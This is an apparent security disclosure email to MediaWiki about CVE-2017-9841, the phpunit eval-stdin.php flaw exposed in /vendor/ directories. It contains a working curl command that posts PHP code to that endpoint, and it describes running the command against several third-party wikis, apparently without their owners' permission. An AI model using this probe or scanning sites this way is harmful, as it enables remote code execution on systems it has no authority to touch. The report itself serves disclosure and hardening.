Per email received on security@
Hi On July 27th this year, CVE-2017-9841[0] was issued noting a vulnerability in phpunit. There is actually a good read about it on vulnbusters[1]. There is a lot of convoluted instructions on using composer with MediaWiki and the need for using the –-no-dev option. Someone using composer to install the MW extension with or without an composer.local.json file would not be aware of using –-no-dev with interacting with composer. Unless I am missing the documentation on MediaWiki.org, please point it out. An excellent sysadmin I work with on a project noticed an odd process running yesterday, Nov 7th. Doing some back tracing, something was installing phpunit version 4.8.24. After blocking, doing research and running composer with the –-no-dev option, the vulnerability was closed. Doing some testing with the following and using wikiapiary to make a list of wikis: curl --data "<?php echo(pi());" https://some-wiki-name.org/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php On the 8th wiki I tried, I came across a vulnerable /vendor/ directory with phpunit. Two of the other 7 returned a 403, so I’m guessing they locked their /vendor/ directory. The other 5 returned a 401. Tested variety from 1.26 on. It was 1.27.1 was the one that returned a vulnerable. Should MediaWiki by default use an .htaccess file in the /vendor/ directory with “Deny from all” by default? Thanks Tom Hutchison [0] http://www.cvedetails.com/cve/CVE-2017-9841/ [1] http://phpunit.vulnbusters.com/